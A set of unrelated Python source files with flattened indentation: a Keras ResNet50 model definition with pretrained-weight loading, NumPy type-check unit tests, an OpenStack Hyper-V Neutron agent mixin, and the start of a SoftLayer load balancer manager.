TH_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.2/resnet50_weights_th_dim_ordering_th_kernels.h5'
TF_WEIGHTS_PATH = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.2/resnet50_weights_tf_dim_ordering_tf_kernels.h5'
TH_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.2/resnet50_weights_th_dim_ordering_th_kernels_notop.h5'
TF_WEIGHTS_PATH_NO_TOP = 'https://github.com/fchollet/deep-learning-models/releases/download/v0.2/resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5'
def identity_block(input_tensor, kernel_size, filters, stage, block):
'''The identity_block is the block that has no conv layer at shortcut
# Arguments
input_tensor: input tensor
kernel_size: defualt 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
'''
nb_filter1, nb_filter2, nb_filter3 = filters
if K.image_dim_ordering() == 'tf':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = Convolution2D(nb_filter1, 1, 1, name=conv_name_base + '2a')(input_tensor)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a')(x)
x = Activation('relu')(x)
x = Convolution2D(nb_filter2, kernel_size, kernel_size,
border_mode='same', name=conv_name_base + '2b')(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b')(x)
x = Activation('relu')(x)
x = Convolution2D(nb_filter3, 1, 1, name=conv_name_base + '2c')(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c')(x)
x = merge([x, input_tensor], mode='sum')
x = Activation('relu')(x)
return x
def conv_block(input_tensor, kernel_size, filters, stage, block, strides=(2, 2)):
'''conv_block is the block that has a conv layer at shortcut
# Arguments
input_tensor: input tensor
kernel_size: defualt 3, the kernel size of middle conv layer at main path
filters: list of integers, the nb_filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
Note that from stage 3, the first conv layer at main path is with subsample=(2,2)
And the shortcut should have subsample=(2,2) as well
'''
nb_filter1, nb_filter2, nb_filter3 = filters
if K.image_dim_ordering() == 'tf':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = Convolution2D(nb_filter1, 1, 1, subsample=strides,
name=conv_name_base + '2a')(input_tensor)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2a')(x)
x = Activation('relu')(x)
x = Convolution2D(nb_filter2, kernel_size, kernel_size, border_mode='same',
name=conv_name_base + '2b')(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2b')(x)
x = Activation('relu')(x)
x = Convolution2D(nb_filter3, 1, 1, name=conv_name_base + '2c')(x)
x = BatchNormalization(axis=bn_axis, name=bn_name_base + '2c')(x)
shortcut = Convolution2D(nb_filter3, 1, 1, subsample=strides,
name=conv_name_base + '1')(input_tensor)
shortcut = BatchNormalization(axis=bn_axis, name=bn_name_base + '1')(shortcut)
x = merge([x, shortcut], mode='sum')
x = Activation('relu')(x)
return x
def ResNet50(include_top=True, weights='imagenet',
input_tensor=None):
'''Instantiate the ResNet50 architecture,
optionally loading weights pre-trained
on ImageNet. Note that when using TensorFlow,
for best performance you should set
`image_dim_ordering="tf"` in your Keras config
at ~/.keras/keras.json.
The model and the weights are compatible with both
TensorFlow and Theano. The dimension ordering
convention used by the model is the one
specified in your Keras config file.
# Arguments
include_top: whether to include the 3 fully-connected
layers at the top of the network.
weights: one of `None` (random initialization)
or "imagenet" (pre-training on ImageNet).
input_tensor: optional Keras tensor (i.e. xput of `layers.Input()`)
to use as image input for the model.
# Returns
A Keras model instance.
'''
if weights not in {'imagenet', None}:
raise ValueError('The `weights` argument should be either '
'`None` (random initialization) or `imagenet` '
'(pre-training on ImageNet).')
# Determine proper input shape
if not K.is_keras_tensor(input_tensor):
img_input = Input(tensor=input_tensor)
else:
img_input = input_tensor
if K.image_dim_ordering() == 'tf':
bn_axis = 3
else:
bn_axis = 1
x = ZeroPadding2D((3, 3))(img_input)
x = Convolution2D(64, 7, 7, subsample=(2, 2), name='conv1')(x)
x = BatchNormalization(axis=bn_axis, name='bn_conv1')(x)
x = Activation('relu')(x)
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1))
x = identity_block(x, 3, [64, 64, 256], stage=2, block='b')
x = identity_block(x, 3, [64, 64, 256], stage=2, block='c')
x = conv_block(x, 3, [128, 128, 512], stage=3, block='a')
x = identity_block(x, 3, [128, 128, 512], stage=3, block='b')
x = identity_block(x, 3, [128, 128, 512], stage=3, block='c')
x = identity_block(x, 3, [128, 128, 512], stage=3, block='d')
x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a')
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='b')
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='c')
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='d')
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='e')
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='f')
x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a')
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b')
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c')
x = AveragePooling2D((7, 7), name='avg_pool')(x)
if include_top:
x = Flatten()(x)
x = Dense(1000, activation='softmax', name='pred')(x)
model = Model(img_input, x)
# load weights
if weights == 'imagenet':
print('K.image_dim_ordering:', K.image_dim_ordering())
if K.image_dim_ordering() == 'th':
if include_top:
weights_path = get_file('resnet50_weights_th_dim_ordering_th_kernels.h5',
TH_WEIGHTS_PATH,
cache_subdir='models',
md5_hash='1c1f8f5b0c8ee28fe9d950625a230e1c')
else:
weights_path = get_file('resnet50_weights_th_dim_ordering_th_kernels_notop.h5',
TH_WEIGHTS_PATH_NO_TOP,
cache_subdir='models',
md5_hash='f64f049c92468c9affcd44b0976cdafe')
model.load_weights(weights_path)
if K.backend() == 'tensorflow':
warnings.warn('You are using the TensorFlow backend, yet you '
'are using the Theano '
'image dimension ordering convention '
'(`image_dim_ordering="th"`). '
'For best performance, set '
'`image_dim_ordering="tf"` in '
'your Keras config '
'at ~/.keras/keras.json.')
convert_all_kernels_in_model(model)
else:
if include_top:
weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels.h5',
TF_WEIGHTS_PATH,
cache_subdir='models',
md5_hash='a7b3fe01876f51b976af0dea6bc144eb')
else:
weights_path = get_file('resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5',
TF_WEIGHTS_PATH_NO_TOP,
cache_subdir='models',
md5_hash='a268eb855778b3df3c7506639542a6af')
model.load_weights(weights_path)
if K.backend() == 'theano':
convert_all_kernels_in_model(model)
return model
if __name__ == '__main__':
model = ResNet50(include_top=True, weights='imagenet')
img_path = 'elephant.jpg'
img = image.load_img(img_path, target_size=(224, 224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
x = preprocess_input(x)
print('Input image shape:', x.shape)
preds = model.predict(x)
print('Predicted:', decode_predictions(preds))
|
|
import numpy as np
from numpy.testing import (
assert_, assert_equal, assert_array_equal, assert_raises
)
from numpy.lib.type_check import (
common_type, mintypecode, isreal, iscomplex, isposinf, isneginf,
nan_to_num, isrealobj, iscomplexobj, asfarray, real_if_close
)
def assert_all(x):
assert_(np.all(x), x)
class TestCommonType:
def test_basic(self):
ai32 = np.array([[1, 2], [3, 4]], dtype=np.int32)
af16 = np.array([[1, 2], [3, 4]], dtype=np.float16)
af32 = np.array([[1, 2], [3, 4]], dtype=np.float32)
af64 = np.array([[1, 2], [3, 4]], dtype=np.float64)
acs = np.array([[1+5j, 2+6j], [3+7j, 4+8j]], dtype=np.csingle)
acd = np.array([[1+5j, 2+6j], [3+7j, 4+8j]], dtype=np.cdouble)
assert_(common_type(ai32) == np.float64)
assert_(common_type(af16) == np.float16)
assert_(common_type(af32) == np.float32)
assert_(common_type(af64) == np.float64)
assert_(common_type(acs) == np.csingle)
assert_(common_type(acd) == np.cdouble)
class TestMintypecode:
def test_default_1(self):
for itype in '1bcsuwil':
assert_equal(mintypecode(itype), 'd')
assert_equal(mintypecode('f'), 'f')
assert_equal(mintypecode('d'), 'd')
assert_equal(mintypecode('F'), 'F')
assert_equal(mintypecode('D'), 'D')
def test_default_2(self):
for itype in '1bcsuwil':
assert_equal(mintypecode(itype+'f'), 'f')
assert_equal(mintypecode(itype+'d'), 'd')
assert_equal(mintypecode(itype+'F'), 'F')
assert_equal(mintypecode(itype+'D'), 'D')
assert_equal(mintypecode('ff'), 'f')
assert_equal(mintypecode('fd'), 'd')
assert_equal(mintypecode('fF'), 'F')
assert_equal(mintypecode('fD'), 'D')
assert_equal(mintypecode('df'), 'd')
assert_equal(mintypecode('dd'), 'd')
#assert_equal(mintypecode('dF',savespace=1),'F')
assert_equal(mintypecode('dF'), 'D')
assert_equal(mintypecode('dD'), 'D')
assert_equal(mintypecode('Ff'), 'F')
#assert_equal(mintypecode('Fd',savespace=1),'F')
assert_equal(mintypecode('Fd'), 'D')
assert_equal(mintypecode('FF'), 'F')
assert_equal(mintypecode('FD'), 'D')
assert_equal(mintypecode('Df'), 'D')
assert_equal(mintypecode('Dd'), 'D')
assert_equal(mintypecode('DF'), 'D')
assert_equal(mintypecode('DD'), 'D')
def test_default_3(self):
assert_equal(mintypecode('fdF'), 'D')
#assert_equal(mintypecode('fdF',savespace=1),'F')
assert_equal(mintypecode('fdD'), 'D')
assert_equal(mintypecode('fFD'), 'D')
assert_equal(mintypecode('dFD'), 'D')
assert_equal(mintypecode('ifd'), 'd')
assert_equal(mintypecode('ifF'), 'F')
assert_equal(mintypecode('ifD'), 'D')
assert_equal(mintypecode('idF'), 'D')
#assert_equal(mintypecode('idF',savespace=1),'F')
assert_equal(mintypecode('idD'), 'D')
class TestIsscalar:
def test_basic(self):
assert_(np.isscalar(3))
assert_(not np.isscalar([3]))
assert_(not np.isscalar((3,)))
assert_(np.isscalar(3j))
assert_(np.isscalar(4.0))
class TestReal:
def test_real(self):
y = np.random.rand(10,)
assert_array_equal(y, np.real(y))
y = np.array(1)
out = np.real(y)
assert_array_equal(y, out)
assert_(isinstance(out, np.ndarray))
y = 1
out = np.real(y)
assert_equal(y, out)
assert_(not isinstance(out, np.ndarray))
def test_cmplx(self):
y = np.random.rand(10,)+1j*np.random.rand(10,)
assert_array_equal(y.real, np.real(y))
y = np.array(1 + 1j)
out = np.real(y)
assert_array_equal(y.real, out)
assert_(isinstance(out, np.ndarray))
y = 1 + 1j
out = np.real(y)
assert_equal(1.0, out)
assert_(not isinstance(out, np.ndarray))
class TestImag:
def test_real(self):
y = np.random.rand(10,)
assert_array_equal(0, np.imag(y))
y = np.array(1)
out = np.imag(y)
assert_array_equal(0, out)
assert_(isinstance(out, np.ndarray))
y = 1
out = np.imag(y)
assert_equal(0, out)
assert_(not isinstance(out, np.ndarray))
def test_cmplx(self):
y = np.random.rand(10,)+1j*np.random.rand(10,)
assert_array_equal(y.imag, np.imag(y))
y = np.array(1 + 1j)
out = np.imag(y)
assert_array_equal(y.imag, out)
assert_(isinstance(out, np.ndarray))
y = 1 + 1j
out = np.imag(y)
assert_equal(1.0, out)
assert_(not isinstance(out, np.ndarray))
class TestIscomplex:
def test_fail(self):
z = np.array([-1, 0, 1])
res = iscomplex(z)
assert_(not np.sometrue(res, axis=0))
def test_pass(self):
z = np.array([-1j, 1, 0])
res = iscomplex(z)
assert_array_equal(res, [1, 0, 0])
class TestIsreal:
def test_pass(self):
z = np.array([-1, 0, 1j])
res = isreal(z)
assert_array_equal(res, [1, 1, 0])
def test_fail(self):
z = np.array([-1j, 1, 0])
res = isreal(z)
assert_array_equal(res, [0, 1, 1])
class TestIscomplexobj:
def test_basic(self):
z = np.array([-1, 0, 1])
assert_(not iscomplexobj(z))
z = np.array([-1j, 0, -1])
assert_(iscomplexobj(z))
def test_scalar(self):
assert_(not iscomplexobj(1.0))
assert_(iscomplexobj(1+0j))
def test_list(self):
assert_(iscomplexobj([3, 1+0j, True]))
assert_(not iscomplexobj([3, 1, True]))
def test_duck(self):
class DummyComplexArray:
@property
def dtype(self):
return np.dtype(complex)
dummy = DummyComplexArray()
assert_(iscomplexobj(dummy))
def test_pandas_duck(self):
# This tests a custom np.dtype duck-typed class, such as used by pandas
# (pandas.core.dtypes)
class PdComplex(np.complex128):
pass
class PdDtype:
name = 'category'
names = None
type = PdComplex
kind = 'c'
str = '<c16'
base = np.dtype('complex128')
class DummyPd:
@property
def dtype(self):
return PdDtype
dummy = DummyPd()
assert_(iscomplexobj(dummy))
def test_custom_dtype_duck(self):
class MyArray(list):
@property
def dtype(self):
return complex
a = MyArray([1+0j, 2+0j, 3+0j])
assert_(iscomplexobj(a))
class TestIsrealobj:
def test_basic(self):
z = np.array([-1, 0, 1])
assert_(isrealobj(z))
z = np.array([-1j, 0, -1])
assert_(not isrealobj(z))
class TestIsnan:
def test_goodvalues(self):
z = np.array((-1., 0., 1.))
res = np.isnan(z) == 0
assert_all(np.all(res, axis=0))
def test_posinf(self):
with np.errstate(divide='ignore'):
assert_all(np.isnan(np.array((1.,))/0.) == 0)
def test_neginf(self):
with np.errstate(divide='ignore'):
assert_all(np.isnan(np.array((-1.,))/0.) == 0)
def test_ind(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isnan(np.array((0.,))/0.) == 1)
def test_integer(self):
assert_all(np.isnan(1) == 0)
def test_complex(self):
assert_all(np.isnan(1+1j) == 0)
def test_complex1(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isnan(np.array(0+0j)/0.) == 1)
class TestIsfinite:
# Fixme, wrong place, isfinite now ufunc
def test_goodvalues(self):
z = np.array((-1., 0., 1.))
res = np.isfinite(z) == 1
assert_all(np.all(res, axis=0))
def test_posinf(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isfinite(np.array((1.,))/0.) == 0)
def test_neginf(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isfinite(np.array((-1.,))/0.) == 0)
def test_ind(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isfinite(np.array((0.,))/0.) == 0)
def test_integer(self):
assert_all(np.isfinite(1) == 1)
def test_complex(self):
assert_all(np.isfinite(1+1j) == 1)
def test_complex1(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isfinite(np.array(1+1j)/0.) == 0)
class TestIsinf:
# Fixme, wrong place, isinf now ufunc
def test_goodvalues(self):
z = np.array((-1., 0., 1.))
res = np.isinf(z) == 0
assert_all(np.all(res, axis=0))
def test_posinf(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isinf(np.array((1.,))/0.) == 1)
def test_posinf_scalar(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isinf(np.array(1.,)/0.) == 1)
def test_neginf(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isinf(np.array((-1.,))/0.) == 1)
def test_neginf_scalar(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isinf(np.array(-1.)/0.) == 1)
def test_ind(self):
with np.errstate(divide='ignore', invalid='ignore'):
assert_all(np.isinf(np.array((0.,))/0.) == 0)
class TestIsposinf:
def test_generic(self):
with np.errstate(divide='ignore', invalid='ignore'):
vals = isposinf(np.array((-1., 0, 1))/0.)
assert_(vals[0] == 0)
assert_(vals[1] == 0)
assert_(vals[2] == 1)
class TestIsneginf:
def test_generic(self):
with np.errstate(divide='ignore', invalid='ignore'):
vals = isneginf(np.array((-1., 0, 1))/0.)
assert_(vals[0] == 1)
assert_(vals[1] == 0)
assert_(vals[2] == 0)
class TestNanToNum:
def test_generic(self):
with np.errstate(divide='ignore', invalid='ignore'):
vals = nan_to_num(np.array((-1., 0, 1))/0.)
assert_all(vals[0] < -1e10) and assert_all(np.isfinite(vals[0]))
assert_(vals[1] == 0)
assert_all(vals[2] > 1e10) and assert_all(np.isfinite(vals[2]))
assert_equal(type(vals), np.ndarray)
# perform the same tests but with nan, posinf and neginf keywords
with np.errstate(divide='ignore', invalid='ignore'):
vals = nan_to_num(np.array((-1., 0, 1))/0.,
nan=10, posinf=20, neginf=30)
assert_equal(vals, [30, 10, 20])
assert_all(np.isfinite(vals[[0, 2]]))
assert_equal(type(vals), np.ndarray)
# perform the same test but in-place
with np.errstate(divide='ignore', invalid='ignore'):
vals = np.array((-1., 0, 1))/0.
result = nan_to_num(vals, copy=False)
assert_(result is vals)
assert_all(vals[0] < -1e10) and assert_all(np.isfinite(vals[0]))
assert_(vals[1] == 0)
assert_all(vals[2] > 1e10) and assert_all(np.isfinite(vals[2]))
assert_equal(type(vals), np.ndarray)
# perform the same test but in-place
with np.errstate(divide='ignore', invalid='ignore'):
vals = np.array((-1., 0, 1))/0.
result = nan_to_num(vals, copy=False, nan=10, posinf=20, neginf=30)
assert_(result is vals)
assert_equal(vals, [30, 10, 20])
assert_all(np.isfinite(vals[[0, 2]]))
assert_equal(type(vals), np.ndarray)
def test_array(self):
vals = nan_to_num([1])
assert_array_equal(vals, np.array([1], int))
assert_equal(type(vals), np.ndarray)
vals = nan_to_num([1], nan=10, posinf=20, neginf=30)
assert_array_equal(vals, np.array([1], int))
assert_equal(type(vals), np.ndarray)
def test_integer(self):
vals = nan_to_num(1)
assert_all(vals == 1)
assert_equal(type(vals), np.int_)
vals = nan_to_num(1, nan=10, posinf=20, neginf=30)
assert_all(vals == 1)
assert_equal(type(vals), np.int_)
def test_float(self):
vals = nan_to_num(1.0)
assert_all(vals == 1.0)
assert_equal(type(vals), np.float_)
vals = nan_to_num(1.1, nan=10, posinf=20, neginf=30)
assert_all(vals == 1.1)
assert_equal(type(vals), np.float_)
def test_complex_good(self):
vals = nan_to_num(1+1j)
assert_all(vals == 1+1j)
assert_equal(type(vals), np.complex_)
vals = nan_to_num(1+1j, nan=10, posinf=20, neginf=30)
assert_all(vals == 1+1j)
assert_equal(type(vals), np.complex_)
def test_complex_bad(self):
with np.errstate(divide='ignore', invalid='ignore'):
v = 1 + 1j
v += np.array(0+1.j)/0.
vals = nan_to_num(v)
# !! This is actually (unexpectedly) zero
assert_all(np.isfinite(vals))
assert_equal(type(vals), np.complex_)
def test_complex_bad2(self):
with np.errstate(divide='ignore', invalid='ignore'):
v = 1 + 1j
v += np.array(-1+1.j)/0.
vals = nan_to_num(v)
assert_all(np.isfinite(vals))
assert_equal(type(vals), np.complex_)
# Fixme
#assert_all(vals.imag > 1e10) and assert_all(np.isfinite(vals))
# !! This is actually (unexpectedly) positive
# !! inf. Comment out for now, and see if it
# !! changes
#assert_all(vals.real < -1e10) and assert_all(np.isfinite(vals))
def test_do_not_rewrite_previous_keyword(self):
# This is done to test that when, for instance, nan=np.inf then these
# values are not rewritten by posinf keyword to the posinf value.
with np.errstate(divide='ignore', invalid='ignore'):
vals = nan_to_num(np.array((-1., 0, 1))/0., nan=np.inf, posinf=999)
assert_all(np.isfinite(vals[[0, 2]]))
assert_all(vals[0] < -1e10)
assert_equal(vals[[1, 2]], [np.inf, 999])
assert_equal(type(vals), np.ndarray)
class TestRealIfClose:
def test_basic(self):
a = np.random.rand(10)
b = real_if_close(a+1e-15j)
assert_all(isrealobj(b))
assert_array_equal(a, b)
b = real_if_close(a+1e-7j)
assert_all(iscomplexobj(b))
b = real_if_close(a+1e-7j, tol=1e-6)
assert_all(isrealobj(b))
class TestArrayConversion:
def test_asfarray(self):
a = asfarray(np.array([1, 2, 3]))
assert_equal(a.__class__, np.ndarray)
assert_(np.issubdtype(a.dtype, np.floating))
# previously this would infer dtypes from arrays, unlike every single
# other numpy function
assert_raises(TypeError,
asfarray, np.array([1, 2, 3]), dtype=np.array(1.0))
|
|
#Copyright 2013 Cloudbase Solutions SRL
#Copyright 2013 Pedro Navarro Perez
#All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
import time
from hyperv.common.i18n import _LE, _LI
from hyperv.common import log as logging
from hyperv.neutron import constants
from hyperv.neutron import utils
from hyperv.neutron import utilsfactory
LOG = logging.getLogger(__name__)
class HyperVNeutronAgentMixin(object):
def __init__(self, conf=None):
"""Initializes local configuration of the Hyper-V Neutron Agent.
:param conf: dict or dict-like object containing the configuration
details used by this Agent. If None is specified, default
values are used instead. conf format is as follows:
{
'host': string,
'AGENT': {'polling_interval': int,
'local_network_vswitch': string,
'physical_network_vswitch_mappings': array,
'enable_metrics_collection': boolean,
'metrics_max_retries': int},
'SECURITYGROUP': {'enable_security_group': boolean}
}
For more information on the arguments, their meaning and their default
values, visit: http://docs.openstack.org/juno/config-reference/content/
networking-plugin-hyperv_agent.html
"""
super(HyperVNeutronAgentMixin, self).__init__()
self._utils = utilsfactory.get_hypervutils()
self._network_vswitch_map = {}
self._port_metric_retries = {}
self.plugin_rpc = None
conf = conf or {}
agent_conf = conf.get('AGENT', {})
security_conf = conf.get('SECURITYGROUP', {})
self._host = conf.get('host', None)
self._polling_interval = agent_conf.get('polling_interval', 2)
self._local_network_vswitch = agent_conf.get('local_network_vswitch',
'private')
self._phys_net_map = agent_conf.get(
'physical_network_vswitch_mappings', [])
self.enable_metrics_collection = agent_conf.get(
'enable_metrics_collection', False)
self._metrics_max_retries = agent_conf.get('metrics_max_retries', 100)
self.enable_security_groups = security_conf.get(
'enable_security_group', False)
self._load_physical_network_mappings(self._phys_net_map)
def _load_physical_network_mappings(self, phys_net_vswitch_mappings):
self._physical_network_mappings = {}
for mapping in phys_net_vswitch_mappings:
parts = mapping.split(':')
if len(parts) != 2:
LOG.debug('Invalid physical network mapping: %s', mapping)
else:
pattern = re.escape(parts[0].strip()).replace('\\*', '.*')
vswitch = parts[1].strip()
self._physical_network_mappings[pattern] = vswitch
def _get_vswitch_for_physical_network(self, phys_network_name):
for pattern in self._physical_network_mappings:
if phys_network_name is None:
phys_network_name = ''
if re.match(pattern, phys_network_name):
return self._physical_network_mappings[pattern]
# Not found in the mappings, the vswitch has the same name
return phys_network_name
def _get_network_vswitch_map_by_port_id(self, port_id):
for network_id, map in self._network_vswitch_map.iteritems():
if port_id in map['ports']:
return (network_id, map)
def network_delete(self, context, network_id=None):
LOG.debug("network_delete received. "
"Deleting network %s", network_id)
# The network may not be defined on this agent
if network_id in self._network_vswitch_map:
self._reclaim_local_network(network_id)
else:
LOG.debug("Network %s not defined on agent.", network_id)
def port_delete(self, context, port_id=None):
LOG.debug("port_delete received")
self._port_unbound(port_id)
def port_update(self, context, port=None, network_type=None,
segmentation_id=None, physical_network=None):
LOG.debug("port_update received")
if self.enable_security_groups:
if 'security_groups' in port:
self.sec_groups_agent.refresh_firewall()
self._treat_vif_port(
port['id'], port['network_id'],
network_type, physical_network,
segmentation_id, port['admin_state_up'])
def _get_vswitch_name(self, network_type, physical_network):
if network_type != constants.TYPE_LOCAL:
vswitch_name = self._get_vswitch_for_physical_network(
physical_network)
else:
vswitch_name = self.local_network_vswitch
return vswitch_name
def _provision_network(self, port_id,
net_uuid, network_type,
physical_network,
segmentation_id):
LOG.info(_LI("Provisioning network %s"), net_uuid)
vswitch_name = self._get_vswitch_name(network_type, physical_network)
if network_type == constants.TYPE_VLAN:
self._utils.set_switch_external_port_trunk_vlan(vswitch_name,
segmentation_id, constants.TRUNK_ENDPOINT_MODE)
elif network_type == constants.TYPE_FLAT:
#Nothing to do
pass
elif network_type == constants.TYPE_LOCAL:
#TODO(alexpilotti): Check that the switch type is private
#or create it if not existing
pass
else:
raise utils.HyperVException(
msg=(_("Cannot provision unknown network type %(network_type)s"
" for network %(net_uuid)s") %
dict(network_type=network_type, net_uuid=net_uuid)))
map = {
'network_type': network_type,
'vswitch_name': vswitch_name,
'ports': [],
'vlan_id': segmentation_id}
self._network_vswitch_map[net_uuid] = map
def _reclaim_local_network(self, net_uuid):
LOG.info(_LI("Reclaiming local network %s"), net_uuid)
del self._network_vswitch_map[net_uuid]
def _port_bound(self, port_id,
net_uuid,
network_type,
physical_network,
segmentation_id):
LOG.debug("Binding port %s", port_id)
if net_uuid not in self._network_vswitch_map:
self._provision_network(
port_id, net_uuid, network_type,
physical_network, segmentation_id)
map = self._network_vswitch_map[net_uuid]
map['ports'].append(port_id)
self._utils.connect_vnic_to_vswitch(map['vswitch_name'], port_id)
if network_type == constants.TYPE_VLAN:
LOG.info(_LI('Binding VLAN ID %(segmentation_id)s '
'to switch port %(port_id)s'),
dict(segmentation_id=segmentation_id, port_id=port_id))
self._utils.set_vswitch_port_vlan_id(
segmentation_id,
port_id)
elif network_type == constants.TYPE_FLAT:
#Nothing to do
pass
elif network_type == constants.TYPE_LOCAL:
#Nothing to do
pass
else:
LOG.error(_LE('Unsupported network type %s'), network_type)
if self.enable_metrics_collection:
self._utils.enable_port_metrics_collection(port_id)
self._port_metric_retries[port_id] = self._metrics_max_retries
def _port_unbound(self, port_id, vnic_deleted=False):
(net_uuid, map) = self._get_network_vswitch_map_by_port_id(port_id)
if net_uuid not in self._network_vswitch_map:
LOG.info(_LI('Network %s is not avalailable on this agent'),
net_uuid)
return
LOG.debug("Unbinding port %s", port_id)
self._utils.disconnect_switch_port(map['vswitch_name'], port_id,
vnic_deleted, True)
if not map['ports']:
self._reclaim_local_network(net_uuid)
def _port_enable_control_metrics(self):
if not self.enable_metrics_collection:
return
for port_id in self._port_metric_retries.keys():
if self._utils.can_enable_control_metrics(port_id):
self._utils.enable_control_metrics(port_id)
LOG.info(_LI('Port metrics enabled for port: %s'), port_id)
del self._port_metric_retries[port_id]
elif self._port_metric_retries[port_id] < 1:
self._utils.enable_control_metrics(port_id)
LOG.error(_LE('Port metrics raw enabling for port: %s'),
port_id)
del self._port_metric_retries[port_id]
else:
self._port_metric_retries[port_id] -= 1
def _update_ports(self, registered_ports):
ports = self._utils.get_vnic_ids()
if ports == registered_ports:
return
added = ports - registered_ports
removed = registered_ports - ports
return {'current': ports,
'added': added,
'removed': removed}
def _treat_vif_port(self, port_id, network_id, network_type,
physical_network, segmentation_id,
admin_state_up):
if self._utils.vnic_port_exists(port_id):
if admin_state_up:
self._port_bound(port_id, network_id, network_type,
physical_network, segmentation_id)
else:
self._port_unbound(port_id)
else:
LOG.debug("No port %s defined on agent.", port_id)
def _treat_devices_added(self, devices):
try:
devices_details_list = self.plugin_rpc.get_devices_details_list(
self.context,
devices,
self.agent_id)
except Exception as e:
LOG.debug("Unable to get ports details for "
"devices %(devices)s: %(e)s",
{'devices': devices, 'e': e})
# resync is needed
return True
for device_details in devices_details_list:
device = device_details['device']
LOG.info(_LI("Adding port %s"), device)
if 'port_id' in device_details:
LOG.info(_LI("Port %(device)s updated. Details: "
"%(device_details)s"),
{'device': device, 'device_details': device_details})
self._treat_vif_port(
device_details['port_id'],
device_details['network_id'],
device_details['network_type'],
device_details['physical_network'],
device_details['segmentation_id'],
device_details['admin_state_up'])
# check if security groups is enabled.
# if not, teardown the security group rules
if self.enable_security_groups:
self.sec_groups_agent.prepare_devices_filter([device])
else:
self._utils.remove_all_security_rules(
device_details['port_id'])
self.plugin_rpc.update_device_up(self.context,
device,
self.agent_id,
self._host)
return False
def _treat_devices_removed(self, devices):
resync = False
for device in devices:
LOG.info(_LI("Removing port %s"), device)
try:
self.plugin_rpc.update_device_down(self.context,
device,
self.agent_id,
self._host)
except Exception as e:
LOG.debug("Removing port failed for device %(device)s: %(e)s",
dict(device=device, e=e))
resync = True
continue
self._port_unbound(device, vnic_deleted=True)
return resync
def _process_network_ports(self, port_info):
resync_a = False
resync_b = False
if 'added' in port_info:
resync_a = self._treat_devices_added(port_info['added'])
if 'removed' in port_info:
resync_b = self._treat_devices_removed(port_info['removed'])
# If one of the above operations fails => resync with plugin
return (resync_a | resync_b)
def daemon_loop(self):
sync = True
ports = set()
while True:
try:
start = time.time()
if sync:
LOG.info(_LI("Agent out of sync with plugin!"))
ports.clear()
sync = False
port_info = self._update_ports(ports)
# notify plugin about port deltas
if port_info:
LOG.debug("Agent loop has new devices!")
# If treat devices fails - must resync with plugin
sync = self._process_network_ports(port_info)
ports = port_info['current']
self._port_enable_control_metrics()
except Exception:
LOG.exception(_LE("Error in agent event loop"))
sync = True
# sleep till end of polling interval
elapsed = (time.time() - start)
if (elapsed < self._polling_interval):
time.sleep(self._polling_interval - elapsed)
else:
LOG.debug("Loop iteration exceeded interval "
"(%(polling_interval)s vs. %(elapsed)s)",
{'polling_interval': self._polling_interval,
'elapsed': elapsed})
|
|
"""
SoftLayer.load_balancer
~~~~~~~~~~~~~~~~~~~~~~~
Load Balancer Manager/helpers
:license: MIT, see LICENSE for more details.
"""
from SoftLayer import exceptions
from SoftLayer.managers import ordering
from SoftLayer import utils
class LoadBalancerManager(utils.IdentifierMixin, object):
"""Manages SoftLayer load balancers.
See product information here: https://www.ibm.com/cloud/load-balancer
:param SoftLayer.API.BaseClient client: the client instance
"""
TYPE = {
1: "Public to Private",
0: "Private to Private",
2: "Public to Public",
}
def __init__(self, client):
self.client = client
self.account = self.client['Account']
self.prod_pkg = self.client['Product_Package']
# Citrix Netscalers
self.adc = self.client['Network_Application_Delivery_Controller']
# IBM CLoud LB
self.lbaas = self.client['Network_LBaaS_LoadBalancer']
